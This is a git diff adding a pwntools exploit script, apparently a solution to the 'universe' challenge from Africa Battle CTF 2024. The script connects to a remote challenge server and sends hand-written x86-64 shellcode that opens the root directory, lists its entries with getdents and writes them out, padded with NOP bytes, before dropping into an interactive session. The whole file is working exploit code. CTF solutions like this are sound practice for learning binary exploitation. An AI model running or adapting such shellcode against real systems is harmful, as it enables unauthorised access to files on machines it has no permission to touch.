diff --git a/africabattlectf_2024/universe/read_files.py b/africabattlectf_2024/universe/read_files.py
new file mode 100644
index 0000000..e1223f6
--- /dev/null
+++ b/africabattlectf_2024/universe/read_files.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./universe", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1004)
+
+# openat + getdents + write
+shellcode="""
+mov r9, [rsp]
+sub r9, 0x1370
+add r9, 0x4500
+mov r15, 0x2f
+push r15
+lea rsi, [rsp]
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+mov edi, eax
+mov al, 78
+mov rsi, r9
+mov dx, 1000
+syscall
+mov edi, 1
+mov eax, 1
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"\x90"*(4096-len(shellcode))
+r.sendline(shellcode)
+
+r.interactive()
\ No newline at end of file